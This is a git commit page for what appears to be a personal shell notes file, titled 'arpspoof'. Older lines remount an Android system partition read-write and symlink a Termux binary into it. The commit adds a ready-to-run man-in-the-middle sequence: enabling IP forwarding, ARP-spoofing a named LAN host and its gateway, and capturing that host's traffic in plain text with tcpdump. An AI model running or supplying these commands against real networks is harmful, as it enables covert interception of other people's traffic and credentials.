arpspoof
This commit is contained in:
parent
df28d50001
commit
c67ed852ff
1 changed files with 6 additions and 0 deletions
|
@ -2,3 +2,9 @@ busybox mount -o rw,remount /system
|
||||||
mount -o rw,remount /system
|
mount -o rw,remount /system
|
||||||
BEFEHL=ffmpeg
|
BEFEHL=ffmpeg
|
||||||
ln -s /data/data/com.termux/files/usr/bin/$BEFEHL /system/xbin/
|
ln -s /data/data/com.termux/files/usr/bin/$BEFEHL /system/xbin/
|
||||||
|
|
||||||
|
echo 1 > /proc/sys/net/ipv4/ip_forward
|
||||||
|
|
||||||
|
arpspoof -i enp30s0 -t 192.168.178.33 -r 192.168.178.1
|
||||||
|
|
||||||
|
tcpdump -i eth0 -A host 192.168.0.5
|
||||||
|
|
Loading…
Reference in a new issue